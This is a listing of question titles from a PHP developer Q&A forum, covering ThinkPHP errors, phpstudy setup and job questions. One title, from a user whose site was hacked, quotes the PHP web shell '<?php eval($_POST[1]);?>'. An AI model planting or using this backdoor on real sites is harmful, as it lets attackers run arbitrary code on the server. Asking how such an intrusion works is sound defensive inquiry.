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报错Class 'think\Facade\Request' not found

update time:2018-11-27 16:16:04
2535Page View1 answers

怎么实现app永不退出 php

update time:2017-04-10 17:12:23
2516Page View1 answers

Hello, why can’t I open the videos on the website? They keep spinning in circles. This is also the case when I watch them on my mobile phone.

update time:2020-03-18 16:24:51
2509Page View0 answers

Urgent request for tp5 ajax request. Data cannot be added to the database.

update time:2018-04-08 20:17:33
2507Page View1 answers

Is there an APP on PHP Chinese website?

update time:2018-07-13 17:22:59
2484Page View2 answers

Free forever

update time:2017-09-19 09:33:16
2470Page View10 answers

Please check whether the program installation path contains spaces and Chinese characters?

update time:2017-09-27 17:08:54
2458Page View2 answers

The website program has been invaded by Trojan [<?php eval($_POST[1]);?> ok]. Please help to find out the mechanism?

update time:2017-06-26 10:48:58
2457Page View5 answers

What can you do by learning PHP? How to find a job?

update time:2019-09-01 12:03:12
2455Page View7 answers

tp6, how to call the inherited save method in the model to add new data?

update time:2019-04-24 10:15:03
2450Page View1 answers

The windows version of phpstudy can only be accessed through localhost, but not through IP!

update time:2018-09-09 22:41:35
2449Page View6 answers

Phpstudy 500 Internal Server Error problem consultation

update time:2018-11-13 09:59:54
2448Page View3 answers

There is a problem with the verification code of the student management system!

update time:2017-12-23 16:58:53
2444Page View7 answers

php - Remove the outermost key of a multi-dimensional array and retain the value

update time:2017-06-23 09:11:13
2443Page View3 answers


update time:2016-11-01 09:44:18
2442Page View1 answers
